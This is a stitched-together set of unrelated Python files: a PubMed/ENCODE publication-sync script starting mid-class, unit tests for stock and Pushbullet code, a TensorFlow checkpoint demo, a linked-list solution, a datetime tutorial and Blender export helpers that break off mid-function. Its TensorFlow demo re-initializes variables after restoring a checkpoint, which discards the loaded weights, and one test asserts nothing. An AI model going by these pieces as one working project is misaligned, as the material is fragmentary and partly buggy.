def find_ENCODE_extras(self, communityList, consortiumList, connection):
    '''finds any publications in the ENCODE database
    that are not in the files provided

    Returns a 4-tuple:
    (community PMIDs only on the server, community @ids lacking a PMID,
     consortium PMIDs only on the server, consortium @ids lacking a PMID)

    The community/consortium scans were identical copy-pasted loops; the
    shared logic now lives in _split_publication_ids().
    '''
    community_url = "/search/?type=publication&status=published" \
        "&published_by=community&field=identifiers&limit=all"
    consortium_url = "/search/?type=publication&status=published" \
        "&published_by!=community&field=identifiers&limit=all"
    communityResult = encodedcc.get_ENCODE(community_url, connection).get("@graph")
    consortiumResult = encodedcc.get_ENCODE(consortium_url, connection).get("@graph")

    communityPMIDfromENCODE, communityOtherID = self._split_publication_ids(communityResult)
    consortiumPMIDfromENCODE, consortiumOtherID = self._split_publication_ids(consortiumResult)

    # PMIDs present on the server but absent from the input files
    community_ENCODE_Only = list(set(communityPMIDfromENCODE) - set(communityList))
    consortium_ENCODE_Only = list(set(consortiumPMIDfromENCODE) - set(consortiumList))
    return community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID

def _split_publication_ids(self, results):
    '''Partition publication search results into PMID identifiers and the
    @ids of publications that have no PMID yet (PMCIDs are skipped).
    '''
    pmids = []      # list of PMID from ENCODE site
    other_ids = []  # list of @ids of publications without a PMID
    for pub in results:
        for idNum in pub.get("identifiers", []):
            if "PMID:" in idNum:
                # this is something that has a pubmed ID
                pmids.append(idNum)
            elif "PMCID:PMC" in idNum:
                # this is an alternate PMID; ignore it
                pass
            else:
                # no PMID yet: record the object @id so it can be
                # looked up and PATCHed later
                other_ids.append(pub.get("@id"))
    return pmids, other_ids
def main():
    """Update ENCODE publication objects from Entrez/PubMed.

    Two modes:
    - default: read consortium/community publication files, compare against
      ENCODE and Entrez, and POST/PATCH as allowed by the CREATE/UPDATE flags;
    - --updateonly FILE: treat FILE as a list of publication UUIDs, resolve
      each to a PMID (via its identifiers or an Entrez title search) and
      re-sync it.
    """
    args = getArgs()
    outfile = args.outfile
    CREATE_ONLY = args.createonly
    UPDATE_ONLY = args.updateonly
    Entrez.email = args.email
    key = encodedcc.ENC_Key(args.keyfile, args.key)
    connection = encodedcc.ENC_Connection(key)
    if args.debug:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)
    print("Running on ", connection.server)
    publication = PublicationUpdate(args)
    if not UPDATE_ONLY:
        publication.setup_publication()
        pmidList = publication.consortium_ids + publication.community_ids
        # merged per-PMID metadata; holds published_by, categories, and data_used
        mergeDicts = publication.consortium_dict.copy()
        mergeDicts.update(publication.community_dict)
        if not CREATE_ONLY:
            publication.get_entrez(pmidList)
        community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID = publication.find_ENCODE_extras(publication.community_ids, publication.consortium_ids, connection)
        total_ENCODE_only = len(community_ENCODE_Only) + len(consortium_ENCODE_Only)
        allOtherIDs = communityOtherID + consortiumOtherID
        publication.check_ENCODE(pmidList, connection, allOtherIDs, mergeDicts)
        log = str(total_ENCODE_only) + " items in ENCODE but not in files"
        logger.info('%s' % log)
        log = str(publication.PATCH_COUNT) + " publication files PATCHed"
        logger.info('%s' % log)
        log = str(publication.POST_COUNT) + " publication files POSTed"
        logger.info('%s' % log)
        print("Results printed to", outfile)
    else:
        infile = UPDATE_ONLY
        with open(infile, 'r') as readfile:
            uuidList = [x.rstrip('\n') for x in readfile]
        # check each publication to see if it has a PMID, if it does add it
        # to the PMIDlist; if it does not have one look it up on Entrez
        pmid_uuid_dict = {}
        for uuid in uuidList:
            pub = encodedcc.get_ENCODE(uuid, connection)
            title = pub.get("title", "")
            identifiers = pub.get("identifiers", [])
            found = False
            for i in identifiers:
                if "PMID:" in i:
                    # NOTE(review): if several PMID identifiers exist the
                    # last one wins — confirm that is acceptable.
                    p = i.split(":")[1]
                    found = True
            if found:
                pmid_uuid_dict[p] = uuid
            else:
                # search Entrez for publication by title
                handle = Entrez.esearch(db="pubmed", term=title)
                record = Entrez.read(handle)
                idlist = record["IdList"]
                if len(idlist) > 1:
                    log = "More than one possible PMID found for " + uuid
                    logger.error('%s' % log)
                    log = str(idlist) + " are possible PMIDs"
                    logger.error('%s' % log)
                elif len(idlist) == 0:
                    log = "No possible PMID found for " + uuid
                    logger.error('%s' % log)
                else:
                    # exactly one candidate: fetch its Medline record
                    handle = Entrez.efetch(db="pubmed", id=idlist, rettype="medline", retmode="text")
                    records = Medline.parse(handle)
                    # save the records, you can convert them to a list
                    records = list(records)
                    for record in records:
                        pm = record.get("PMID")
                        ti = record.get("TI")
                        log = "Publication " + uuid + " with title \"" + title + "\" matches PMID:" + pm + " with title \"" + ti + "\""
                        logger.info('%s' % log)
                        # persist the discovered PMID on the ENCODE object
                        identifiers.append("PMID:" + pm)
                        encodedcc.patch_ENCODE(uuid, connection, {"identifiers": identifiers})
                        pmid_uuid_dict[pm] = uuid
        pmidList = list(pmid_uuid_dict.keys())
        publication.get_entrez(pmidList)
        with open("pub_update.txt", "w") as f:
            for pmid in pmid_uuid_dict.keys():
                publication.compare_entrez_ENCODE(pmid_uuid_dict[pmid], pmid, connection)
            f.write(str(len(pmid_uuid_dict.keys())) + " publications checked " + str(publication.PATCH_COUNT) + " publications PATCHed")
# Run the publication sync when executed as a script.
if __name__ == '__main__':
    main()
| 21,009 | 5,619 |
import unittest
from src.factory import DayFactory, TransactionsFactory
from src.value_objects import Stock, StockTransaction, CashTransaction
from src.day import Day
class DayTest(unittest.TestCase):
    """Tests for Day: stock catalog, transactions and closing balances."""

    def setUp(self):
        # A day "D0" holding three quoted stocks and 1000 opening cash.
        self.D0: Day = DayFactory().create("D0", ["AAPL 100", "GOOG 200", "SP500 175.75"], 1000)
        # Mixed stock/cash transactions parsed from "SYMBOL ACTION QTY AMOUNT" strings.
        self.T0 = TransactionsFactory().create([
            "AAPL SELL 100 30000",
            "GOOG BUY 10 10000",
            "CASH DEPOSIT 0 1000",
            "CASH FEE 0 50",
            "GOOG DIVIDEND 0 50",
            "TD BUY 100 10000"
        ])
        self.stock_list = ["AAPL", "GOOG", "SP500"]

    def test_set_catalog(self):
        # Catalog lists the symbols supplied at construction, in order.
        self.assertEqual(self.stock_list, self.D0.catalog)

    def test_get_stocks(self):
        self.assertEqual({"AAPL": 100, "GOOG": 200, "SP500": 175.75}, self.D0.get_stocks())

    def test_add(self):
        stock = Stock("MSFT", 100)
        self.D0.add(stock)
        # New stock is appended after the three from setUp.
        self.assertEqual(self.D0.stocks[3], stock)

    def test_fill(self):
        facebook = Stock("F", 100)
        uber = Stock("Uber", 100)
        stocks = [facebook, uber]
        length = len(self.D0.stocks)
        self.D0.fill(stocks)
        # fill() appends; the first filled stock lands at the old length.
        self.assertEqual(self.D0.stocks[length].symbol, facebook.symbol)

    def test_add_stock_transaction(self):
        # A SELL is stored as a negative share amount.
        self.D0.add_stock_transaction(self.T0[0])
        self.assertEqual(self.D0.transactions["AAPL"][0]['amount'], -100)

    def test_add_cash_transaction(self):
        transaction = CashTransaction("CASH", "0", 1000, "DEPOSIT")
        self.D0.add_cash_transaction(transaction)
        self.assertEqual(self.D0.cash_transactions[0], 1000)

    def test_add_transactions(self):
        # NOTE(review): this test resets the containers but asserts nothing,
        # so it can never fail. TODO: add assertions or remove it.
        self.D0.transactions = []
        self.D0.cash_transactions = []

    def test_get_closing_stocks(self):
        self.assertEqual({'AAPL': 100.0, 'GOOG': 200.0, 'SP500': 175.75}, self.D0.get_closing_stocks())

    def test_get_closing_cash(self):
        self.assertEqual(self.D0.get_closing_cash(), 1000)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 2,044 | 826 |
# Author: Mark Buckler
"""Quantization"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from config import *
from dataset import pascal_voc, kitti
from utils.util import bbox_transform, Timer
from nets import *
# Command-line flags (TF1-style tf.app.flags).
FLAGS = tf.app.flags.FLAGS

tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/bichen/logs/squeezeDet/train',
                           """Path to the training checkpoint.""")
tf.app.flags.DEFINE_string('net', 'squeezeDet',
                           """Neural net architecture.""")

# NOTE(review): this import sits after the flag definitions and appears
# unused in this file — confirm whether it can be removed.
from tensorflow.python import pywrap_tensorflow
def quantize():
    """Load a detection checkpoint and demo direct weight mutation.

    Restores the graph and weights from FLAGS.checkpoint_path, then for the
    first convolution-kernel variable found: prints it, adds 1 to every
    element via tf.assign, prints it again, and exits the process.
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'

    with tf.Graph().as_default() as g:

        assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \
            or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \
            'Selected neural net architecture not supported: {}'.format(FLAGS.net)

        # Build the model config (and model) matching the requested net.
        if FLAGS.net == 'vgg16':
            mc = kitti_vgg16_config()
            mc.BATCH_SIZE = 1  # TODO(bichen): allow batch size > 1
            mc.LOAD_PRETRAINED_MODEL = False
            model = VGG16ConvDet(mc)
        elif FLAGS.net == 'resnet50':
            mc = kitti_res50_config()
            mc.BATCH_SIZE = 1  # TODO(bichen): allow batch size > 1
            mc.LOAD_PRETRAINED_MODEL = False
            model = ResNet50ConvDet(mc)
        elif FLAGS.net == 'squeezeDet':
            mc = kitti_squeezeDet_config()
            mc.BATCH_SIZE = 1  # TODO(bichen): allow batch size > 1
            mc.LOAD_PRETRAINED_MODEL = False
            model = SqueezeDet(mc)
        elif FLAGS.net == 'squeezeDet+':
            mc = kitti_squeezeDetPlus_config()
            mc.BATCH_SIZE = 1  # TODO(bichen): allow batch size > 1
            mc.LOAD_PRETRAINED_MODEL = False
            model = SqueezeDetPlus(mc)

        # Start a session
        with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
            # Load in the metagraph
            ckpt_path = FLAGS.checkpoint_path
            saver = tf.train.import_meta_graph(ckpt_path+'.meta',clear_devices=True)
            saver.restore(sess, ckpt_path)

            # Initialize the variables
            # NOTE(review): running the initializer AFTER saver.restore()
            # re-initializes every variable and discards the restored
            # checkpoint values — confirm this ordering is intentional.
            sess.run(tf.global_variables_initializer())

            # Extract the variables into a list
            # NOTE(review): tf.all_variables() is deprecated in favor of
            # tf.global_variables() in TF >= 0.12.
            all_vars = tf.all_variables()
            for var in all_vars:
                # Only conv kernels; skip optimizer slot variables.
                if (('kernels' in var.name) and (not ('Momentum' in var.name))):
                    print(var.name)
                    print(sess.run(var))
                    add_1_op = tf.assign(var,var + 1)
                    sess.run(add_1_op)
                    print(sess.run(var))
                    # stop after the first matching kernel variable
                    exit()
    return
def main(argv=None):  # pylint: disable=unused-argument
    """Entry point invoked by tf.app.run(): run the quantization pass."""
    return quantize()
# tf.app.run() parses the flags and then calls main().
if __name__ == '__main__':
    tf.app.run()
| 2,832 | 1,009 |
# Anders Poirel
class ListNode:
    """Singly linked list node."""
    def __init__(self, x):
        self.val = x
        self.next = None


class Solution:
    def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
        """Delete the n-th node from the end of the list and return the head.

        Two-pointer technique: `lead` is placed n-1 nodes ahead of `trail`;
        when `lead` reaches the tail, `trail` sits on the node to remove.
        """
        lead = head
        trail = head
        before = None
        # put the lead pointer n-1 nodes ahead of trail
        for _ in range(n - 1):
            lead = lead.next
        # advance both until lead reaches the last node
        while lead.next is not None:
            lead = lead.next
            before = trail
            trail = trail.next
        # unlink trail; when trail is the head, the list simply starts later
        if trail is head:
            return trail.next
        before.next = trail.next
        return head
| 579 | 163 |
import pytest
from runflow import runflow
# Skip this module when the dependency these tasks actually need is absent.
# (Was 'slack_sdk' — a copy-paste slip: every test here mocks 'pushbullet'.)
pytest.importorskip('pushbullet')
def test_pushbullet_push_note(mocker):
    """The push-note flow forwards title/body to Pushbullet.push_note."""
    fake_client = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', fake_client)

    flow_vars = {'pushbullet_api_key': 'any'}
    runflow(path="examples/pushbullet_push_note.hcl", vars=flow_vars)

    fake_client.return_value.push_note.assert_called_with(
        title='This is the title',
        body='This is the note',
        email='',
        channel=None,
    )
def test_pushbullet_push_link(mocker):
    """The push-link flow forwards title/url to Pushbullet.push_link."""
    fake_client = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', fake_client)

    flow_vars = {'pushbullet_api_key': 'any'}
    runflow(path="examples/pushbullet_push_link.hcl", vars=flow_vars)

    fake_client.return_value.push_link.assert_called_with(
        title='This is the title',
        url='https://runflow.org',
        body='',
        email='',
        channel=None,
    )
def test_pushbullet_push_file(mocker):
    """The push-file flow forwards file metadata to Pushbullet.push_file."""
    fake_client = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', fake_client)

    flow_vars = {'pushbullet_api_key': 'any'}
    runflow(path="examples/pushbullet_push_file.hcl", vars=flow_vars)

    fake_client.return_value.push_file.assert_called_with(
        title='This is the title',
        body='This is the body',
        file_type='image/jpeg',
        file_name='cat.jpg',
        file_url='https://i.imgur.com/IAYZ20i.jpg',
        email='',
        channel=None,
    )
def test_pushbullet_invalid_client(mocker, capsys):
    """A client block without api_key reports an error on stderr."""
    fake_client = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', fake_client)

    flow_source = """
flow "invalid_client" {
    task "pushbullet_push" "this" {
        client = {
        }
    }
}
"""
    runflow(source=flow_source)

    _, err = capsys.readouterr()
    assert 'set api_key' in err
| 1,674 | 593 |
"""Date and time"""
# imports
import arrow
from datetime import date, datetime, timedelta, timezone
import time
import calendar as cal
from zoneinfo import ZoneInfo
# --- stdlib date/time demos first; a short `arrow` demo closes the file ---

# date
today = date.today()
print(today)
# datetime.date(2021, 3, 28)
print(today.ctime())
print(today.isoformat())
print(today.weekday())  # Monday == 0 ... Sunday == 6
print(cal.day_name[today.weekday()])
print(today.day, today.month, today.year)
print(today.timetuple())
# print(time.struct_time(tm_year=2021, tm_mon=3, tm_mday=28, tm_hour=0, tm_min=0, tm_sec=0,
#           tm_wday=6, tm_yday=87, tm_isdst=-1))

# time
time.ctime()
print(time.daylight)
time.gmtime()
# time.struct_time(
#     tm_year=2021, tm_mon=3, tm_mday=28,
#     tm_hour=14, tm_min=23, tm_sec=34,
#     tm_wday=6, tm_yday=87, tm_isdst=0
# )
time.gmtime(0)  # the Unix epoch
# time.struct_time(
#     tm_year=1970, tm_mon=1, tm_mday=1,
#     tm_hour=0, tm_min=0, tm_sec=0,
#     tm_wday=3, tm_yday=1, tm_isdst=0
# )
time.localtime()
# time.struct_time(
#     tm_year=2021, tm_mon=3, tm_mday=28,
#     tm_hour=15, tm_min=23, tm_sec=50,
#     tm_wday=6, tm_yday=87, tm_isdst=1
# )
time.time()  # seconds since the epoch, as a float

# datetime, timezones and timedelta
now = datetime.now()
# NOTE(review): datetime.utcnow() returns a *naive* datetime (tzinfo=None)
# and is deprecated since Python 3.12 in favor of datetime.now(timezone.utc).
utcnow = datetime.utcnow()
print(now)
# datetime.datetime(2021, 3, 28, 15, 25, 16, 258274)
print(utcnow)
# datetime.datetime(2021, 3, 28, 14, 25, 22, 918195)
print(now.date())
# datetime.date(2021, 3, 28)
print(now.day, now.month, now.year)
var = now.date() == date.today()  # True: same calendar day
print(now.time())
# datetime.time(15, 25, 16, 258274)
# now.hour, now.minute, now.second, now.microsecond
now.ctime()
# 'Sun Mar 28 15:25:16 2021'
now.isoformat()
# '2021-03-28T15:25:16.258274'
now.timetuple()
# time.struct_time(
#     tm_year=2021, tm_mon=3, tm_mday=28,
#     tm_hour=15, tm_min=25, tm_sec=16,
#     tm_wday=6, tm_yday=87, tm_isdst=-1
# )
print(now.tzinfo)     # None: datetime.now() is naive
print(utcnow.tzinfo)  # None as well
now.weekday()
# 6

# aware datetimes: one via zoneinfo, one via a fixed UTC offset
f_bday = datetime(
    1975, 12, 29, 12, 50, tzinfo=ZoneInfo('Europe/Rome')
)
h_bday = datetime(
    1981, 10, 7, 15, 30, 50, tzinfo=timezone(timedelta(hours=2))
)
diff = h_bday - f_bday
type(diff)
# <class 'datetime.timedelta'>
print(diff.days)
# 2109
diff.total_seconds()
# 182223650.0
today + timedelta(days=49)
# datetime.date(2021, 5, 16)
now + timedelta(weeks=7)
# datetime.datetime(2021, 5, 16, 15, 25, 16, 258274)

# parsing (stdlib)
datetime.fromisoformat('1977-11-24T19:30:13+01:00')
# datetime.datetime(
#     1977, 11, 24, 19, 30, 13,
#     tzinfo=datetime.timezone(datetime.timedelta(seconds=3600))
# )
datetime.fromtimestamp(time.time())
# datetime.datetime(2021, 3, 28, 15, 42, 2, 142696)
datetime.now()
# datetime.datetime(2021, 3, 28, 15, 42, 1, 120094)

# arrow small demo
arrow.utcnow()
# <Arrow [2021-03-28T14:43:20.017213+00:00]>
arrow.now()
# <Arrow [2021-03-28T15:43:39.370099+01:00]>
local = arrow.now('Europe/Rome')
print(local)
# <Arrow [2021-03-28T16:59:14.093960+02:00]>
local.to('utc')
# <Arrow [2021-03-28T14:59:14.093960+00:00]>
local.to('Europe/Moscow')
# <Arrow [2021-03-28T17:59:14.093960+03:00]>
local.to('Asia/Tokyo')
# <Arrow [2021-03-28T23:59:14.093960+09:00]>
print(local.datetime)
# datetime.datetime(
#     2021, 3, 28, 16, 59, 14, 93960,
#     tzinfo=tzfile('/usr/share/zoneinfo/Europe/Rome')
# )
local.isoformat()
# '2021-03-28T16:59:14.093960+02:00'
| 3,269 | 1,804 |
# Copyright (c) 2017-2019 Soft8Soft LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import math
import bpy
import numpy as np
import mathutils
import pyosl.glslgen
# Axes whose pairwise dot products exceed this are not considered orthogonal.
ORTHO_EPS = 1e-5

DEFAULT_MAT_NAME = 'v3d_default_material'

# Module-level selection state used by setSelectedObject()/restoreSelectedObjects().
selectedObject = None
selectedObjectsSave = []
prevActiveObject = None
def clamp(val, minval, maxval):
    """Constrain val to the closed interval [minval, maxval]."""
    capped = min(maxval, val)
    return max(minval, capped)
def integerToBlSuffix(val):
    """Blender-style numeric suffix: the value left-padded with '0' to 3 chars."""
    suffix = str(val)
    padding = '0' * (3 - len(suffix))
    return padding + suffix
def getLightCyclesStrength(bl_light):
    # Exported light strength is Blender's energy value, unmodified.
    return bl_light.energy
def getLightCyclesColor(bl_light):
    """Light color as a plain [r, g, b] list."""
    col = bl_light.color
    return [col[i] for i in range(3)]
def setSelectedObject(bl_obj):
    """
    Select object for NLA baking.

    Saves the current selection and active object into module-level globals
    so restoreSelectedObjects() can undo this, then makes bl_obj the only
    selected and active object.
    """
    global prevActiveObject
    global selectedObject, selectedObjectsSave

    selectedObject = bl_obj
    selectedObjectsSave = bpy.context.selected_objects.copy()

    # NOTE: seems like we need both selection and setting active object
    for o in selectedObjectsSave:
        o.select_set(False)

    prevActiveObject = bpy.context.view_layer.objects.active
    bpy.context.view_layer.objects.active = bl_obj
    bl_obj.select_set(True)
def restoreSelectedObjects():
    """Undo setSelectedObject(): restore the saved selection and active object,
    then reset the module-level bookkeeping globals."""
    global prevActiveObject
    global selectedObject, selectedObjectsSave

    selectedObject.select_set(False)
    for o in selectedObjectsSave:
        o.select_set(True)

    bpy.context.view_layer.objects.active = prevActiveObject

    prevActiveObject = None
    selectedObject = None
    selectedObjectsSave = []
def getSceneByObject(obj):
    """Return the scene that actually contains obj, or None if no scene does."""
    for candidate in bpy.data.scenes:
        found = candidate.objects.find(obj.name)
        if found < 0:
            continue
        # name match alone is not enough — verify it is the same object
        if candidate.objects[found] == obj:
            return candidate
    return None
def getTexImage(bl_tex):
    """
    Image of the given texture, or None when the texture has no
    'image' attribute (e.g. a texture of type 'NONE').
    """
    try:
        return bl_tex.image
    except AttributeError:
        return None
def getTextureName(bl_texture):
    """Display name for a texture: the image name for image/environment
    texture nodes, the node's own name otherwise."""
    if (isinstance(bl_texture, (bpy.types.ShaderNodeTexImage,
            bpy.types.ShaderNodeTexEnvironment))):
        tex_name = bl_texture.image.name
    else:
        tex_name = bl_texture.name

    return tex_name
def mat4IsIdentity(mat4):
    # True when the 4x4 matrix is exactly the identity (i.e. no transform).
    return mat4 == mathutils.Matrix.Identity(4)
def mat4IsTRSDecomposable(mat4):
    """True when the rotation part of the matrix has mutually orthogonal
    axes, i.e. it can be decomposed into translation/rotation/scale."""
    # don't use mathutils.Matrix.is_orthogonal_axis_vectors property, because it
    # doesn't normalize vectors before checking
    mat = mat4.to_3x3().transposed()
    v0 = mat[0].normalized()
    v1 = mat[1].normalized()
    v2 = mat[2].normalized()
    # each pairwise dot product must be (near) zero
    return (abs(v0.dot(v1)) < ORTHO_EPS
            and abs(v0.dot(v2)) < ORTHO_EPS
            and abs(v1.dot(v2)) < ORTHO_EPS)
def mat4SvdDecomposeToMatrs(mat4):
    """
    Decompose the given matrix into a couple of TRS-decomposable matrices.
    Returns a (mat_left, mat_right) tuple, or None in case of an error.
    """
    try:
        # SVD of the 3x3 part: mat3 = U * S * VH
        u, s, vh = np.linalg.svd(mat4.to_3x3())
        mat_u = mathutils.Matrix(u)
        mat_s = mathutils.Matrix([[s[0], 0, 0], [0, s[1], 0], [0, 0, s[2]]])
        mat_vh = mathutils.Matrix(vh)

        # NOTE: a potential reflection part in U and VH matrices isn't considered
        mat_trans = mathutils.Matrix.Translation(mat4.to_translation())
        # left factor carries the translation plus U*S; right factor is VH
        mat_left = mat_trans @ (mat_u @ mat_s).to_4x4()

        return (mat_left, mat_vh.to_4x4())
    except np.linalg.LinAlgError:
        # numpy failed to decompose the matrix
        return None
def findArmature(obj):
    """Armature object driving obj via an ARMATURE modifier, or the result
    of obj.find_armature() as a fallback, or None."""
    for mod in obj.modifiers:
        if mod.type != 'ARMATURE' or mod.object is None:
            continue
        return mod.object

    # use obj.find_armature as a last resort, because it doesn't work with
    # many armature modifiers
    return obj.find_armature()
def matHasBlendBackside(bl_mat):
    """True when a blended material also renders its back faces
    (show_transparent_back present and enabled)."""
    return (matIsBlend(bl_mat)
            and hasattr(bl_mat, 'show_transparent_back')
            and bl_mat.show_transparent_back)


def matIsBlend(bl_mat):
    """True for alpha-blended blend methods (BLEND / MULTIPLY / ADD)."""
    return bl_mat.blend_method in ('BLEND', 'MULTIPLY', 'ADD')
def updateOrbitCameraView(cam_obj, scene):
    """Re-orient an orbit camera so it looks at its orbit target
    (either an explicit target object or the stored target point)."""
    target_obj = cam_obj.data.v3d.orbit_target_object

    eye = cam_obj.matrix_world.to_translation()
    target = (cam_obj.data.v3d.orbit_target if target_obj is None
            else target_obj.matrix_world.to_translation())

    # build the look-at rotation, then re-express it in the object's basis
    quat = getLookAtAlignedUpMatrix(eye, target).to_quaternion()
    quat.rotate(cam_obj.matrix_world.inverted())
    quat.rotate(cam_obj.matrix_basis)

    # apply via quaternion mode, then restore the original rotation mode
    rot_mode = cam_obj.rotation_mode
    cam_obj.rotation_mode = 'QUATERNION'
    cam_obj.rotation_quaternion = quat
    cam_obj.rotation_mode = rot_mode

    # need to update the camera state (i.e. world matrix) immediately in case of
    # several consecutive UI updates
    bpy.context.view_layer.update()
def getLookAtAlignedUpMatrix(eye, target):
    """
    Rotation matrix orienting a camera at `eye` towards `target`.
    This method uses camera axes for building the matrix.
    """
    # camera looks down -Z, so Z points from target back to eye
    axis_z = (eye - target).normalized()

    if axis_z.length == 0:
        # eye coincides with target: fall back to a fixed direction
        axis_z = mathutils.Vector((0, -1, 0))

    # X is perpendicular to world-up and Z
    axis_x = mathutils.Vector((0, 0, 1)).cross(axis_z)

    if axis_x.length == 0:
        # looking straight up/down: pick an arbitrary X
        axis_x = mathutils.Vector((1, 0, 0))

    axis_y = axis_z.cross(axis_x)

    return mathutils.Matrix([
        axis_x,
        axis_y,
        axis_z,
    ]).transposed()
def objDataUsesLineRendering(bl_obj_data):
    """True when line rendering is enabled in the object data's v3d settings."""
    v3d_props = getattr(bl_obj_data, 'v3d', None)
    settings = getattr(v3d_props, 'line_rendering_settings', None)
    return bool(settings and settings.enable)
def getObjectAllCollections(blObj):
    """All collections that contain blObj anywhere in their hierarchy."""
    containing = []
    for coll in bpy.data.collections:
        if blObj in coll.all_objects[:]:
            containing.append(coll)
    return containing
def getBlurPixelRadius(context, blLight):
    """Approximate shadow blur radius in pixels for the given light,
    derived from its soft-shadow setting and the EEVEE shadow map size."""
    if blLight.type == 'SUN':
        cascade_size = int(context.scene.eevee.shadow_cascade_size)
        radius = blLight.shadow_buffer_soft / 100 * cascade_size
        # blur strength doesn't increase after a certain point
        return min(max(radius, 0), 100)

    cube_size = int(context.scene.eevee.shadow_cube_size)
    grade = math.floor(blLight.shadow_buffer_soft * cube_size / 1000)
    grade = min(grade, 9)

    # some approximation of Blender blur radius
    if grade > 2:
        return 4.22 * (grade - 1.5)
    return grade
def objHasExportedModifiers(obj):
    """
    Check if an object has any modifiers that should be applied before export.

    Uses a generator with any() so the scan short-circuits on the first
    exportable modifier instead of materializing an intermediate list.
    """
    return any(modifierNeedsExport(mod) for mod in obj.modifiers)
def obj_del_not_exported_modifiers(obj):
    """
    Remove modifiers that shouldn't be applied before export from an object.

    Iterates over a snapshot of the modifier stack: removing entries from a
    collection while iterating it directly can skip the element following
    each removed one.
    """
    for mod in list(obj.modifiers):
        if not modifierNeedsExport(mod):
            obj.modifiers.remove(mod)
def objAddTriModifier(obj):
    """Append a temporary triangulation modifier (fixed quad split,
    custom normals preserved) to the object's modifier stack."""
    tri_mod = obj.modifiers.new('Temporary_Triangulation', 'TRIANGULATE')
    tri_mod.quad_method = 'FIXED'
    tri_mod.keep_custom_normals = True
def objApplyModifiers(obj):
    """
    Creates a new mesh from applying modifiers to the mesh of the given object.
    Assignes the newly created mesh to the given object. The old mesh's user
    count will be decreased by 1.
    """
    dg = bpy.context.evaluated_depsgraph_get()

    # object must be in the master collection and visible for the
    # depsgraph to evaluate its modifiers; remember what to undo
    need_linking = dg.scene.collection.objects.find(obj.name) == -1
    need_showing = obj.hide_viewport

    # NOTE: link the object if it's not in the 'Master Collection' and update
    # the view layer to make the depsgraph able to apply modifiers to the object
    if need_linking:
        dg.scene.collection.objects.link(obj)

    obj.update_tag()

    # a hidden object doesn't get its modifiers applied, need to make it visible
    # before updating the view layer
    if need_showing:
        obj.hide_viewport = False

    bpy.context.view_layer.update()

    # NOTE: some modifiers can remove UV layers from an object after applying
    # (e.g. Skin), which is a consistent behavior regarding uv usage in the
    # viewport (e.g. degenerate tangent space in the Normal Map node)
    obj_eval = obj.evaluated_get(dg)
    obj.data = bpy.data.meshes.new_from_object(obj_eval,
            preserve_all_data_layers=True, depsgraph=dg)
    obj.modifiers.clear()

    # undo the temporary link/show from above
    if need_linking:
        dg.scene.collection.objects.unlink(obj)
    if need_showing:
        obj.hide_viewport = True
def objTransferShapeKeys(obj_from, obj_to, depsgraph):
    """
    Transfer shape keys from one object to another if it's possible:
        - obj_from should be in the current view layer to be evaluated by depsgraph
        - obj_to should not have shape keys
        - obj_from (after evaluating) and obj_to should have the same amount of vertices
    Returns a boolean flag indicating successful transfer.
    """
    if obj_from.data.shape_keys is None:
        # nothing to transfer counts as success
        return True

    key_blocks_from = obj_from.data.shape_keys.key_blocks
    # skip the reference (basis) key and keys that are their own relative key
    keys_from = [key for key in key_blocks_from if key != key.relative_key
            and key != obj_from.data.shape_keys.reference_key]
    key_names = [key.name for key in keys_from]
    key_values = [key.value for key in keys_from]
    key_positions = []

    # zero all keys so each one can be sampled in isolation below
    for key in keys_from:
        key.value = 0

    same_vertex_count = True
    for key in keys_from:
        # activate just this key and capture the evaluated vertex positions
        key.value = 1
        obj_from.update_tag()
        bpy.context.view_layer.update()
        verts = obj_from.evaluated_get(depsgraph).data.vertices

        if len(verts) != len(obj_to.data.vertices):
            same_vertex_count = False
            break

        key_pos = [0] * 3 * len(verts)
        verts.foreach_get('co', key_pos)
        key_positions.append(key_pos)
        key.value = 0

    if same_vertex_count:
        # basis shape key
        obj_to.shape_key_add(name=obj_from.data.shape_keys.reference_key.name)

        # NOTE(review): vert_co appears unused — confirm it can be removed.
        vert_co = [0] * 3 * len(obj_to.data.vertices)
        for i in range(len(key_names)):
            key_block = obj_to.shape_key_add(name=key_names[i])
            key_block.value = key_values[i]
            key_block.data.foreach_set('co', key_positions[i])
    else:
        # don't create nothing if vertex count isn't constant
        pass

    # restore the original key values on the source object
    for i in range(len(keys_from)):
        keys_from[i].value = key_values[i]

    return same_vertex_count
def meshNeedTangentsForExport(mesh, optimize_tangents):
    """
    Check if it's needed to export tangents for the given mesh.

    Without UV layers tangents are meaningless; otherwise they are exported
    when a material needs them, or unconditionally if optimization is off.
    """
    if not meshHasUvLayers(mesh):
        return False
    return meshMaterialsUseTangents(mesh) or not optimize_tangents
def meshHasUvLayers(mesh):
    """True when the mesh has an active UV layer and at least one layer."""
    active_layer = mesh.uv_layers.active
    return bool(active_layer and len(mesh.uv_layers) > 0)
def meshMaterialsUseTangents(mesh):
    """True when any node-based material on the mesh contains a node that
    needs tangents (see matNodeUseTangents), or when a material slot is
    empty (treated conservatively as 'uses tangents')."""
    for mat in mesh.materials:
        if mat and mat.use_nodes and mat.node_tree != None:
            # walk the tree including nested node groups
            node_trees = extractMaterialNodeTrees(mat.node_tree)
            for node_tree in node_trees:
                for bl_node in node_tree.nodes:
